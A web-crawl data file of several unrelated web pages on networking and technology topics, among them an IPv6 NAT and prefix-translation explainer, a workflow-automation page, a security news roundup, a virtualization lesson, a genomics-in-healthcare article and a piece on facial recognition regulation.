However, smaller organizations that only have a single ISP today will likely be granted only Provider Assigned (PA) IPv6 addresses from that ISP's block. These smaller organizations will be faced with IPv6 re-addressing if they choose to switch service providers. Customers may need to quickly switch service providers and may not have ample time to renumber. However, IPv6 does make it relatively easy to run multiple sets of addresses in parallel, so if you have any warning of an ISP change and can deploy the new addresses early in the process, there are very good tools for managing the deprecation of the old addresses in an orderly fashion. In other words, readdressing an IPv6 environment is easier than readdressing an IPv4 environment.
Some organizations today use multiple upstream ISPs and obtain IPv4 address blocks from each of those ISPs. They use these public IPv4 addresses on the external interfaces of their firewalls to PAT outbound connections. Their internal network systems use private IPv4 addresses and exit to the Internet through one of these Internet egress points using PAT. Their return traffic comes back symmetrically due to the use of public IPv4 addresses from the ISPs. These organizations are multi-homed, but are not using BGP, do not have their own IPv4 addresses, and are relying on NAT as a somewhat limited substitute for BGP routing. These organizations will not have the same functionality with IPv6 because there is no PAT-like function defined for IPv6. However, any such organization would easily qualify for IPv6 Provider Independent (PI) addresses, and setting up a minimal BGP connection is no longer very difficult. Any organization in this situation should seriously consider moving to BGP routing as it is the most flexible solution and does not have to be expensive or difficult, contrary to popular belief.
However, if address translation is required in your environment, the IPv6 version is known as “Network Prefix Translation” (NPT) and is documented here: http://tools.ietf.org/html/rfc6296
In NPT, only the prefix (e.g. The /48) is translated and not the subnet or interface identifier. For example, if you have an internal range of fd20:010d:08b5::/48 and an external prefix from your first provider of 2001:db8:beef::/48 and your second provider gives you 2001:db8:cafe::/48 and you have a host which internally is numbered fd20:010d:08b5:babe::8:beef, the external presentation of that host to provider 1 would be 2001:db8:beef:babe::8:beef and to provider 2 would be 2001:db8:cafe:babe::8:beef. Notice only the first 48 bits changed from the internal representation. The remaining digits remained identical.
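To make the mechanics concrete, the small Python sketch below performs the same prefix rewrite on the example addresses above. It only illustrates the prefix swap; a real RFC 6296 implementation also adjusts one 16-bit word of the address so that transport checksums remain valid.

import ipaddress

def translate_prefix(addr, external_net):
    """Replace the address's /48 prefix with external_net's, keeping the low 80 bits."""
    host_bits = int(addr) & ((1 << 80) - 1)            # subnet and interface identifier
    return ipaddress.IPv6Address(int(external_net.network_address) | host_bits)

provider1 = ipaddress.IPv6Network("2001:db8:beef::/48")
provider2 = ipaddress.IPv6Network("2001:db8:cafe::/48")
host = ipaddress.IPv6Address("fd20:010d:08b5:babe::8:beef")   # internal ULA address

print(translate_prefix(host, provider1))   # 2001:db8:beef:babe::8:beef
print(translate_prefix(host, provider2))   # 2001:db8:cafe:babe::8:beef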
NPT is not called NAT66, in an effort to avoid confusion with PAT-based NAT44, since NPT operates significantly differently from PAT. NPT performs a one-to-one mapping of IPv6 addresses. It does not provide overloading like IPv4 PAT, and it does not use a "pool" of public addresses. NPT can provide increased security and better forensics because of the one-to-one mapping, which the large amount of available IPv6 addresses makes possible. IPv4 could not use a system like this because IPv4 addresses are becoming increasingly scarce.
The challenge today is that many network devices do not yet support NPT for IPv6. Manufacturers of routers and firewalls have many IPv6 features, but they have yet to include NPT as one of their default options. However, it is likely that in the next year, manufacturers of routers and firewalls will integrate NPT into their software.
What about the security I get from NAT?
Many people who learn about how IPv6 will be deployed to residential broadband CPE devices are concerned about the fact that their internal systems will receive public IPv6 addresses. They are concerned that this is leaving them open to attack from the Internet. NAT has been used in IPv4 environments for “topology hiding” of the internal IPv4 addressing because the systems on the Internet only see the source address of the NAT pool or the PAT system’s single public IPv4 address. IPv6 makes this irrelevant, topology hiding is not a necessity. IPv6 address space is so immense that tracking one system’s source address, particularly if it changes periodically, is a difficult task. Just like the IPv6 nodes are sparsely scattered within a single /64 subnet, IPv6 subnets are also sparsely allocated.
More general information on Local Network Protection for IPv6 RFC 4864 is documented here: http://tools.ietf.org/html/rfc4864
In reality, it is important to develop a better understanding of how “NAT Security” actually works in a home gateway. There are two components to PAT. One (the component that provides security) is a stateful correlation of inbound packets to existing outbound flows. The second component is the one that rewrites parts of the header based on the contents of those state tables (which doesn’t actually provide any security at all). The first part is technically known as “stateful inspection”. Technically NAT or PAT refers only to the second component (the rewriting of the packet header), but because NAT/PAT requires stateful inspection to operate, the terms are often used to refer to the combined process. Unfortunately, this has created the false perception that NAT/PAT provide security.
Stateful Inspection (the part that provides the security) is readily available in most IPv6 Customer Premise devices, but you should make sure that your device has it. With stateful inspection, your public addresses are every bit as safe as your private addresses were in IPv4.
The reality is that the CPE, local gateway will still perform stateful filtering and prevent inbound Internet connections. The Cable Modem with embedded router (eRouter) or Linksys/D-Link/NetGEAR device that the subscriber purchased will allow upstream connections that were initiated from the internal home network but it would prevent unsolicited inbound connections from the Internet. The CPE router will still act as a “stateful” firewall even though the IPv6 addresses allocated to the home use global unicast addresses. Following are two RFCs that govern how CPE devices do not use NAT/PAT for IPv6 in the same way NAT/PAT is used for IPv4.
Basic Requirements for IPv6 Customer Edge Routers, RFC 6204, http://tools.ietf.org/html/rfc6204
Recommended Simple Security Capabilities in Customer Premises Equipment (CPE) for Providing Residential IPv6 Internet Service, RFC 6092, http://tools.ietf.org/html/rfc6092
How do ISP’s assign addresses to customers?
For dedicated Internet connectivity customers, an ISP may elect to allocate the customer a /48 Provider Assigned (PA) IPv6 block from the ISP's /32-or-larger IPv6 block. DHCPv6 Prefix Delegation (PD) is used as the method to allocate global unicast IPv6 prefixes to the subscriber's CPE device for use internal to that subscriber's location. The prefix delegated to the customer could be as large as a /48, which provides for significant flexibility and future-proofing on the end-user side, or any longer value up to a single /64, which would be the most restrictive (only one subnet) value that can be given to an end-user. Service providers could elect to allocate a single /64 for residential broadband subscribers and allocate larger prefixes, up to and including a /48, for their business-class customers. The challenge today is that many consumer-grade CPE devices only support receiving a single /64 prefix, which restricts the number of subnets a customer can have within their location. Consumer electronics manufacturers are continuing to educate themselves about IPv6 and will be producing products capable of IPv6 subnetting.
What about cross-protocol Translation?
Running IPv4 and IPv6 simultaneously (dual-stack) is the preferred transition strategy. However, it is not always feasible to deploy IPv6 this way. Tunneling IPv6 packets through an IPv4 cloud is less optimal, but can be used as a last-resort method. Translating between IPv6 and IPv4 packets is considered undesirable, so it is ironic that there is so much effort being put into translation techniques.
There are many forms of translation intended for "transition". Most of them do more to hinder transition than help in most circumstances. A detailed discussion of these is out of scope for this document, but if you want to find more information, search for cross-protocol translation techniques such as NAT64, DNS64, and NAT-PT.
Even though Network Prefix Translation (NPT) exists, your organization should be using global IPv6 addresses and relying on stateful packet filtering and other diverse approaches for security. NAT66 does not exist, and you do not need PAT for IPv6 because there is no scarcity of IPv6 addresses. You will be able to provide the same security for IPv6 Internet communications as you do today for IPv4, and you will have a simpler environment to maintain without the use of NAT. Without NAT for IPv6, end-to-end communications will be much easier to troubleshoot, using public addresses for the source and destination systems.
Owen DeLong and Scott Hogg | <urn:uuid:7930994b-0701-4af5-851a-3f2dcb0f85a7> | CC-MAIN-2022-40 | https://blogs.infoblox.com/ipv6-coe/ipv6-nat-you-can-get-it-but-you-may-not-need-or-want-it/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00594.warc.gz | en | 0.934396 | 3,033 | 3.109375 | 3 |
What is a Workflow?
Why workflow management systems are important for organizations
What is a workflow?
A workflow is a set of steps necessary to accomplish business objectives and is visually outlined through diagrams and charts. Workflows are used across businesses to operate more transparently, effectively and with faster time to ROI.
The three components of a workflow
- Input: The start of a workflow, which involves either resources (documents, forms, etc.), tools or employees that are essential to complete steps in this process.
- Transformation: All the actions that are triggered from the input and changes that lead to the output.
- Output: The result of the transformation. Alternatively, the output can serve as the input for the next step in upcoming workflows.
Types of workflows
- Sequential workflows are chart-based, and the completion of a specific business task depends on the previous step.
- State machine workflows could go back and forth in between workflow steps — and are often seen in processes that involve many stakeholders or rely on feedback from key decision makers.
- Rules-driven workflows are executed based on sequential workflows with varying and complex tools to determine success.
Differences between workflows, processes and checklists
A process is the broader set of activities an organization carries out to reach a business goal, a workflow is the specific, repeatable sequence of steps and hand-offs within that process, and a checklist is a simple list of tasks to tick off, with no routing logic between them.
The difference between an automated and manual workflow
In a manual workflow, each step can only progress with human involvement. Automated workflows use process automation technology to assign tasks and route documents, which makes them quicker and more accurate than manual ones and minimizes the repetitive steps that bog down processes.
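As a rough illustration of the difference, the short Python sketch below models an automated workflow in which each step is routed to whichever team member currently has the lightest workload; the staff names and steps are made up for the example. In a manual workflow, a person would have to perform this hand-off at every step.

# Hypothetical staff and their current number of open tasks.
workload = {"amara": 2, "ben": 5, "carol": 1}

# A sequential workflow: each step runs in order.
steps = ["capture form data", "review documents", "approve request", "notify requester"]

def route(step):
    """Assign the step to the least-busy person, as an automated system might."""
    assignee = min(workload, key=workload.get)
    workload[assignee] += 1
    print(f"'{step}' routed to {assignee}")

for step in steps:
    route(step)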
HR and employee onboarding
Manual, repetitive administrative activities can reduce any HR department to frustrating processes of paper-chasing and switching back and forth between systems. With the help of workflow automation — HR can simplify:
- Onboarding new employees
- Training new recruits
- Approving or denying annual leave requests
- Managing harassment claims
- Investigating safety incidents
- Simplifying employee document acknowledgment
IT service requests
When it comes to making work easier for your IT teams, a connected workflow system gives them the ability to resolve issues or roll out updates faster with a complete view of all the crucial information needed.
Accounts payable (AP)
It’s becoming increasingly expensive to process paper invoices, and the cost multiplies when you add manual data entry to the mix. Automated invoice workflows, however, deliver accurate information to the hands of the right stakeholders across an organization — for faster reviews and approvals to take place before confirmed data is posted into respective financial systems. Specific to the AP journey, deploying workflows can:
- Standardize AP processes across an organization to eliminate confusion
- Go paperless with electronic data capture tools
- Minimize delays and allow for faster information access
What are workflow charts and how are they created?
Workflow charts (also referred to as workflow diagrams) are graphic representations of the sequential steps that must be executed to successfully complete a task, accompanied by the specifics of what must occur and in which sequence.
What does a workflow chart look like?
Best practices when creating a workflow chart include:
- Narrow down the very first workflow trigger, followed by what a successfully completed task looks like.
- Branch out from your first “trigger” and map out each subsequent step from the start to the end of a task.
- Identify and outline the resources needed. These could come in the form of documents, employees responsible or key decision-makers that will accelerate processes.
- Execute this workflow. For faster completion, identify potential bottlenecks in advance and outline alternatives in case they occur, so the process can continue.
- Introduce automation to your workflow to boost productivity and eliminate the risks of error-prone manual entries.
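A chart built from the steps above can also be captured as data. The small Python sketch below represents a hypothetical leave-request workflow as a mapping from each step to the steps that can follow it, which is roughly what workflow software stores behind the diagram; the step names are placeholders.

# Hypothetical leave-request workflow chart: each step maps to its possible next steps.
workflow_chart = {
    "submit request": ["manager review"],
    "manager review": ["approved", "rejected"],    # a decision point branches the chart
    "approved": ["update calendar"],
    "rejected": ["notify employee"],
    "update calendar": [],
    "notify employee": [],
}

def walk(step, indent=0):
    """Print the chart from a starting trigger, one branch per level of indentation."""
    print(" " * indent + step)
    for nxt in workflow_chart[step]:
        walk(nxt, indent + 2)

walk("submit request")    # the input/trigger that starts the workflow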
What is a workflow management system and how does it work?
Workflow management automates processes, sharing work efficiently between workers and matching them with the best task for their respective skillset and job functions.
In a higher education admissions setting, for example, this would mean that, after a college application was entered into workflow automation software, it would be electronically routed to the right staff member. That could be based on workload, specialization or any other factor the university decided.
Supporting material such as transcripts and essays could be attached and easily retrieved, which would free staff from the low-value tasks of hunting for loose paper documentation.
Once they’re done with their work, the work task is automatically routed to the next worker.
What are the benefits of a workflow management system?
Workflow management systems benefit organizations that are challenged with:
- Employees spending too much time searching for documents
- Some employees who are swamped with work, while others are idle
- Busy decision makers causing bottlenecks in the process
- Employees cherry-picking work (most interesting, most valuable to them, etc.) to the detriment of corporate goals
A workflow management system solves the above challenges — with agile tools that support faster routes to documents, efficient processes and minimal manual involvement. These can result in:
Reduced risks in project management
Workflows that are efficient ensure that schedule delays are kept to a minimum. Organizations also minimize the productivity losses that come with not having a centralized location to store, share and access the documents required to move the workflow along.
Increased accountability with clearer role definitions
With a visible workflow in place, it becomes easier for team members to see who’s in charge (or just involved) in specific sequences — so there is no confusion about task responsibilities and when to get them done.
Transparent monitoring of all critical missions
Every crucial stage of the workflow can be instantly examined to make sure there are no problems holding teams back from completion. This will greatly benefit project managers when they need to assess how smoothly the procedure is going from start to finish.
Solid regulatory compliance
Solid workflow trails outline each step showing how goals are achieved, supporting compliance efforts and enabling a transparent line of accountability across organizations.
High-caliber customer service experiences
Organizations that implement workflow automation can free up their employees to focus on higher-value tasks like delivering better customer experiences.
Using OnBase to streamline workflows
Hyland’s business process automation solutions are built to optimize manual, repetitive activities that slow down workflows across an organization.
This is done through OnBase, an enterprise information platform that allows organizations to make critical decisions faster by automating specific tasks and empowering employees to focus on delivering better customer experiences and other high-value goals. OnBase helps with:
- Creating and simplifying workflows with an automated approach to complex processes
- Gathering accurate information with customizable electronic forms
- Accelerating document reviews and approvals
- Identifying process bottlenecks, non-compliant situations and anomalies with a process mining tool | <urn:uuid:9795c48e-40af-4852-bb2c-63d4dcc1d7ab> | CC-MAIN-2022-40 | https://www.hyland.com/en/resources/terminology/workflow | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00594.warc.gz | en | 0.930477 | 1,418 | 3.109375 | 3 |
Tomorrow, the world will make one more historic move from the networking address protocol known as IPv4 to IPv6. Last year’s 24-hour test now becomes permanent as IPv6 will be turned on and will remain running for participating organizations.
What does this mean and why should you care?
Well, in some ways it speaks to the phenomenal growth of the web and how much our lives have quickly changed.
To transfer data over the internet, packets are routed using an addressing protocol that gives each addressable device its own address. The current address system we have in place is known as IPv4 (e.g. A.B.C.D, or four nodes) and has 2^32, or about 4.3 billion, addresses available. Or I should say had available.
In February 2011, the last block of top level IPv4 addresses were granted. Now, all of these aren’t necessarily in use. The amazing thing is that in the short time of the internet, we saw billions of IPv4 addresses assigned. Essentially, the internet as we know it was about to run out of space. Too many cars on the road, as it were.
To change that, a number of years ago, the IPv6 protocol was established using 128-bit addresses (written as eight groups of hexadecimal digits rather than IPv4's four dotted-decimal nodes), rather than 32-bit addressing. This expands the potential number of addresses on the internet from 2^32 to 2^128.
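The difference is easy to see with two lines of Python:

print(2 ** 32)    # 4,294,967,296 IPv4 addresses (about 4.3 billion)
print(2 ** 128)   # 340,282,366,920,938,463,463,374,607,431,768,211,456 IPv6 addresses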
So what does this mean for your company? Well, at some point if you don’t prepare for the switch you may begin to experience some hang ups and some sticky patches. Simply put, you are going to need to make the switch to IPv6 or at least run parallel systems. The great news is that Websense web security solutions are already IPv6 capable, so you can keep your networks safe from malicious, advanced threats and data loss over the web.
What else do you need to do to prepare? Well, InformationWeek has a great article on recommendations to make the switch in your business. As a fun aside, a quick question for you. What is the strangest internet addressable object you have ever come across? A toaster? A toilet? Let us know what kind of crazy connectivity you have found in the comments below. | <urn:uuid:e1102090-ecbf-495e-ad9b-f1b2bab376a8> | CC-MAIN-2022-40 | https://www.forcepoint.com/blog/insights/world-ipv6-day-internet-expands | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00594.warc.gz | en | 0.954837 | 474 | 2.734375 | 3 |
With the advent of machine learning and artificial intelligence (AI), amazing progress has been made in terms of having computers do more of our work for us. However, offloading work to computers and algorithms comes with a hidden danger. When decision-making power is handed from people to algorithms, the decisions are suddenly assumed to be correct and immune to bias, even though this is far from the truth.
Not only can algorithms dangerously simplify complicated real-world situations to yes/no decisions or single numbers, but over-confidence in the accuracy of an algorithm can remove any kind of accountability or ability to second-guess a computer’s decision.
One example from nearly two years ago is a ProPublica report on racial bias in a system used to calculate risk scores for people as they are processed through the criminal justice system. In their research they found that these systems assigned higher risk scores to African-Americans, and that these systems were widely used, sometimes at every point of the process in the criminal justice system.
Another interesting “gotcha” of AI is adversarial input - an active area of research regarding various ways and means to fool different AI systems. Here is a 3D printed turtle designed to fool Google’s inception v3 image classifier into thinking it’s a rifle, and this is a sticker designed to fool the VGG16 neural network into thinking a toaster is the subject of an image, regardless of what else is present.
Meanwhile, AI is being swiftly applied to everything that can’t get up and run away from a data scientist: analyzing military drone footage, determining who to search at the border, various aspects of crime-fighting, and secretive police facial recognition programs. While moving decision-making work towards computers and away from humans may appear to remove human bias from important decisions, we risk hard-coding existing bias into unquestionable and un-auditable algorithms.
If we’re going to leverage AI in making social decisions, we need to take great care to take that input with a healthy dose of skepticism and context.
Shutting Down E-Stalkers
Stalkers have long been a problem, and have grown adept at using technology to track their victims. The most recent instance of this is the growing proliferation of “dual-use” tracking applications, often dubbed spyware or stalkerware. While marketed as legitimate applications to track children or family, these apps are all too often used without the tracked person’s knowledge or consent, such as spying on a partner’s private texts in an attempt to uncover suspected cheating.
However, someone has apparently found an alternative solution by just repeatedly hacking a stalkerware provider until they shut down.
While this might help the victims who are being tracked without their consent by this particular service, the full problem is social and not easily handled with technical solutions. Learning to spot the tell-tale signs of stalkerware on your smartphone or personal computer is a good start. Even better is knowing how to spot red flags in a relationship that can be warning signs of abusive behaviors, and learning how to reach out to others for emotional support and physical help to get out of bad relationships.
“Alexa, Creep Me Out In The Middle Of The Night”
Tying the previous two stories together, we are now hearing reports of Amazon Alexa units creepily laughing at people for an unknown reason. The working theory is that the unit mistakenly thinks the user says "Alexa, laugh", but there are also reports of units laughing spontaneously.
No word yet on if they laugh when nobody is around to hear them laugh, or if Amazon is working on a Poltergeist-as-a-Service (PoiP) that is simply being rolled out to select users as a test. I was unsettled enough at the thought of an always-on microphone in my house, but unprompted tauntings are enough for me to flee to the woods.
All that said, keep your ears perked for your own Alexa unit to try scaring you, since it seems likely Amazon will exorcise the issue before too long. | <urn:uuid:20d2dda4-7076-4d08-9662-4f0899a7e576> | CC-MAIN-2022-40 | https://blogs.blackberry.com/en/2018/03/this-week-in-security-ai-bias-stalker-apps-ai-laughing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00794.warc.gz | en | 0.953246 | 858 | 2.796875 | 3 |
The virtualization mechanism has several key components. In this CCNA Certification lesson, we will focus on these virtualization components in a Virtual Network Infrastructure. So, what are the key components of virtualization? The three components of the Virtual Network Structure are given below:
- Host Machines
- Virtual Machines
- Hypervisor
Now, let’s talk about these Virtual Network Infrastructure components in detail.
The first component of the Virtual Network Structure is the Host Machine. A Host Machine is the physical hardware that the virtual machines reside on. It is the device that has the physical resources, such as memory, storage and processors. These resources are used by the virtual machines, according to their configuration, during the virtualization process. Host machines are the physical devices that run the virtualization software that creates and manages virtual machines.
The other Virtual Network Structure component is the Virtual Machine. A Virtual Machine is a virtual device that resides in the host machine and emulates a single physical device in software. In other words, a Virtual Machine is created in the host machine with the virtual resources it needs. Each virtual machine thinks that it is the only device in the system, but there can be many different virtual machines in the host machine. The main aim of virtualization is exactly this multiple usage.
A Virtual Machine can be a PC, a server, a router, a firewall etc. According to your needs, you can create virtual machines of different sizes in the physical host machine.
The communication between the host machine and the virtual machines is done via the Hypervisor.
The last Virtual Network Structure component is the Hypervisor. A Hypervisor is the key part of virtualization; in other words, virtualization is commonly hypervisor-based. It is also called a Virtual Machine Manager. A Hypervisor is basically software that is used to create and manage virtual machines in the host machine. The main purpose of a Hypervisor is to manage the virtual devices and provide them with the necessary system resources.
There are two types of Hypervisors according to their working style. These are given below:
- Type 1 Hypervisor (Bare-Metal Hypervisor)
- Type 2 Hypervisor (Hosted Hypervisor)
A Type 1 Hypervisor, or Bare-Metal Hypervisor, is software that is installed and runs directly on top of the physical hardware, the host machine. It has its own operating system. This type of Hypervisor is used mainly on data center devices.
The advantages of a Type 1 Hypervisor (Bare-Metal Hypervisor) are high availability, better performance and scalability, because it can access system resources directly.
VMware ESXi and Hyper-V are examples of this type of Hypervisor.
A Type 2 Hypervisor, or Hosted Hypervisor, runs on an operating system installed on the hardware, instead of running directly on the hardware like Type 1. In this system, each Virtual Machine runs over the Hypervisor. This type of Hypervisor is generally used to run multiple operating systems on one physical machine: there is one host operating system, the Hypervisor resides on it, and it allows us to create multiple guest operating systems on top of it.
There is no need for separate management console software with a Type 2 Hypervisor (Hosted Hypervisor). This is an important advantage, and it makes this type of Hypervisor more popular.
VMware Workstation, VirtualBox, Virtual PC, VMware Fusion and Parallels on Mac OS X are examples of Type 2 Hypervisors (Hosted Hypervisors).
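As a quick practical aside, on a Linux host machine you can check whether the processor exposes the hardware virtualization extensions that hypervisors rely on. The Python sketch below reads /proc/cpuinfo and looks for the Intel (vmx) or AMD (svm) CPU flags; it is a rough, Linux-only check for illustration, not an official tool.

# Rough check for hardware virtualization support on a Linux host machine.
with open("/proc/cpuinfo") as f:
    cpuinfo = f.read()

if "vmx" in cpuinfo or "svm" in cpuinfo:      # Intel VT-x or AMD-V flags
    print("CPU reports hardware virtualization support.")
else:
    print("No virtualization flags found; hypervisors may run slowly or not at all.")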
We have talked about the key Virtualization components of the Virtual Network Infrastructure. We have focused Host machine, Virtual Machine, Type 1 Hypervisor and Type 2 Hypervisor. | <urn:uuid:f4047cff-def4-4b2b-8c21-f54bf6f46aa8> | CC-MAIN-2022-40 | https://ipcisco.com/lesson/virtual-network-structure/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00794.warc.gz | en | 0.894246 | 703 | 3.40625 | 3 |
Shaping healthcare’s future with genomic data
The costs of genome sequencing are also influenced by the nature of genomes themselves, which are paradoxical in that they’re both unique yet highly similar in people. “You don’t usually have to sequence the whole genome,” Hunter explained. “You can look for particular markers. Human beings are 99.9 percent identical with each other at the sequence level. So we can just look for the parts that are different.” Focusing on common areas of differences in genomes is known as genotyping, which increases the efficiency of sequencing genes for both research and clinical purposes.
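The idea of looking only at the positions that differ can be sketched in a few lines of Python. The reference and sample sequences below are invented toy data, vastly shorter than a real genome, but the comparison is the same in spirit.

# Toy example: find the positions where a sample differs from a reference sequence.
reference = "ACGTACGTACGT"
sample    = "ACGTACCTACGA"

variants = [
    (position, ref_base, sample_base)
    for position, (ref_base, sample_base) in enumerate(zip(reference, sample))
    if ref_base != sample_base
]

print(variants)   # [(6, 'G', 'C'), (11, 'T', 'A')]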
From research to clinical care
Spurred in part by the decreased costs of analyzing genomes for mutations, which contribute to healthcare conditions, genetic data is in the process of transitioning from research settings to clinical use. The University of Colorado incorporates genotyping and genome sequencing for clinical care of patients at both a children’s and adult hospital—Children’s Hospital Colorado and UC Health respectively. RDConnect’s Scientific Advisory Board (a European rare diseases council of which Hunter is a member) has been building out infrastructure to diagnose children with rare diseases. “It’s by far the most effective tool at this point for kids with an undiagnosed problem or detecting disease early,” Hunter said. Clinical usage of genomic data is aided by exomes, which Hunter described as “the part of a genome that will be translated into a protein. Most of the genetic changes, not all of them, that will cause disease cause a change in the protein part.” Exome sequencing increases the productivity of genotyping, which makes genome sequencing much more viable in clinical settings than it was before.
Scale and processing power
The need to compile a host of unstructured, semi-structured and structured data from both internal and external sources presents massive challenges for those working with genetic data. That diversity fuels questions of compute power and scale, each of which is critical to such an undertaking. “As these modern sequencing machines generate their data, you’re talking about reams of a hundred to thousands of terabytes,” said Tom Plasterer, head of research of the Research Development Group at AstraZeneca.
AstraZeneca is attempting to counteract afflictions related to cardiovascular, cancerous, metabolic, respiratory and other issues as part of its role in a global genomic initiative attempting to sequence 2 million samples in the next several years. The magnitude of the data is multiplied when working with certain conditions such as cancer, which frequently requires sequencing both normal and cancerous cells to identify variants. “Right there you’re faced with a huge computational problem where you need to reassemble those genomes,” Plasterer said.
AstraZeneca accounts for those processing demands with elastic computing resources in the cloud, which scale up or down as needed “for additional compute power and then go back to an environment where we’re not paying for all those systems when we don’t need them,” Reinold explained. Additional cloud benefits include compression techniques for more cost-effective storage and the means of accessing data from multiple locations.
Integration and aggregation
The true value of genomic sequencing comes from cross-referencing such data with the abundance of external resources dedicated to genetic information, pharmaceuticals and healthcare conditions. “A lot of this data is available in public sources,” Biotricity’s Al-Siddiq said. “You’ve got information from multiple people and databases that study a very specific disease so you know which mutation to go after.” Most of that semi-structured or unstructured data was created with varying data models, formats and taxonomies, which make integration with traditional relational techniques cumbersome and time-consuming.
A more practical approach is to “do a semantic integration that translates all those different databases into an ontological form of knowledge representation, one that’s really just about the biology,” Hunter said. “So now you can query this knowledgebase without having to know which database the information came from or how that database is organized or any of that. All you have to know about is the biology.”
One of the innate benefits of such an approach is that by linking data on an RDF graph with common ontological models, users can accommodate the evolving nature of biological informatics. New developments related to genomic data, characteristics, mutations and more are readily encompassed within the underlying semantic technologies linking what were initially disparate data types. That methodology facilitates both semantic and logical consistency for representing facets of genomic research that may one day change or, perhaps more commonly, become disputed. | <urn:uuid:e0e202a5-e719-48d1-9e19-b976b95c1b59> | CC-MAIN-2022-40 | https://www.kmworld.com/Articles/Editorial/Features/Shaping-healthcares-future-with-genomic-data-120390.aspx?pageNum=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00794.warc.gz | en | 0.949082 | 981 | 2.953125 | 3 |
How much e-waste does the U.S. government generate? According to General Services Administration (GSA) head Martha Johnson, “By some estimates, the federal government goes through 10,000 computers a week.”
And that’s not the only staggering statistic in this Washington Post/Bloomberg article that examines the steps the GSA and EPA are taking to combat e-waste and boost a U.S. recycling industry that currently employs 30,000 workers and generates $5 billion in revenue each year. This entails the adoption of a third party certification standard that would dictate how the federal government recycles its IT equipment — paving the way for industry at large to follow suit.
The two front runners are E-Stewards (notable for banning the export of e-waste to developing regions) and the business-friendlier Responsible Recycling or R2 certs. For now, be sure to keep an eye on this fight as it could very well end up influencing your business’ IT procurement and recycling policies.
Update: Below you’ll find links to more info on the certs mentioned in this post.
Image courtesy of Ulises Jorge, Flickr – CC | <urn:uuid:ef783650-c189-477c-aa70-ff60c4e47fa4> | CC-MAIN-2022-40 | https://www.ecoinsite.com/2011/09/ewaste-federal-government-disposes-10000-computers-per-week.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00794.warc.gz | en | 0.932416 | 253 | 2.546875 | 3 |
Parents who spend a lot of time on their phones or watching television during family activities such as meals, playtime, and bedtime could influence their long-term relationships with their children.
This is according to Brandon T. McDaniel of Illinois State University and Jenny S. Radesky of the University of Michigan Medical School, both in the US, who say so called “technoference” can lead children to show more frustration, hyperactivity, whining, sulking or tantrums.
The study in the journal Pediatric Research, which is published by Springer Nature, examines the role and impact digital devices play in parenting and child behavior.
Technoference is defined as everyday interruptions in face-to-face interactions because of technology devices.
Recent studies estimate that parents use television, computers, tablets and smartphones for nine hours per day on average.
A third of this time is spent on smartphones, which due to their portability are often used during family activities such as meals, playtime, and bedtime — all important times involved in shaping a child’s social-emotional wellbeing.
When parents are on their devices research shows that they have fewer conversations with their children and are more hostile when their offspring try to get their attention.
In this study, 172 two-parent families (total of 337 parents) with a child age 5 years or younger answered online questionnaires as part of a research project about parenting and family relationships conducted between 2014 and 2016.
Participants indicated how often per day different devices interrupted their conversations or activities with their children.
Parents rated their child’s internalizing behavior such as how often they sulked or how easily their feelings were hurt, as well as their externalizing behavior, such as how angry or easily frustrated they were.
The parents also reported on their own levels of stress and depression, the coparenting support they received from their partners, and their child’s screen media use.
In almost all cases, one device or more intruded in parent-child interactions at some stage during the day.
Technology may serve as a refuge for parents who have to cope with difficult child behavior. However, the survey results showed that this tactic had its drawbacks.
Electronic device use likely deprives parents of the opportunity to provide meaningful emotional support and positive feedback to their children which causes their offspring to revert to even more problematic behaviour such as throwing tantrums or sulking.
This only added to parents’ stress levels, likely leading to more withdrawal with technology, and the cycle continues.
“These results support the idea that relationships between parent technoference and child externalizing behavior are transactional and influence each other over time,” says McDaniel.
“In other words, parents who have children with more externalizing problems become more stressed, which may lead to their greater withdrawal with technology, which in turn may contribute to more child externalizing problems.”
“Children may be more likely to act out over time in response to technoference as opposed to internalize,” adds Radesky, for whom the findings corroborate mealtime observations of how a child’s bad behavior often escalates in an effort to get the attention of their parents using mobile devices.
- Brandon T. McDaniel, Jenny S. Radesky. Technoference: longitudinal associations between parent technology use, parenting stress, and child behavior problems. Pediatric Research, 2018; DOI: 10.1038/s41390-018-0052-6 | <urn:uuid:babe915e-f183-4a83-90d8-d611bc3d70ee> | CC-MAIN-2022-40 | https://debuglies.com/2018/06/14/research-shows-that-parents-who-use-their-smartphone-to-escape-the-stress-of-their-childs-bad-behavior-may-be-making-it-worse/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00194.warc.gz | en | 0.970301 | 730 | 3.265625 | 3 |
Facial recognition technology has been fodder for crummy science fiction movies and techno-thriller novels for decades, but in the last couple years it has been woven into many facets of real life. Schools, shopping malls, concert venues, and law enforcement agencies all use facial recognition systems for various applications, some of which have become quite controversial. One of the world’s largest tech companies is now asking the federal government to step in and provide a regulatory framework for law enforcement and others who use the technology.
Microsoft President Brad Smith, whose company provides facial recognition technology to private companies and government agencies, said in a blog post that he has come to the conclusion that Congress needs to step in and regulate the ways in which organizations deploy the technology and use the data they collect. Smith said the technology has advanced to a point that it’s accurate enough for many applications, but the privacy and security thinking around it hasn’t kept pace.
“We believe Congress should create a bipartisan expert commission to assess the best way to regulate the use of facial recognition technology in the United States. This should build on recent work by academics and in the public and private sectors to assess these issues and to develop clearer ethical principles for this technology. The purpose of such a commission should include advice to Congress on what types of new laws and regulations are needed, as well as stronger practices to ensure proper congressional oversight of this technology across the executive branch,” Smith wrote.
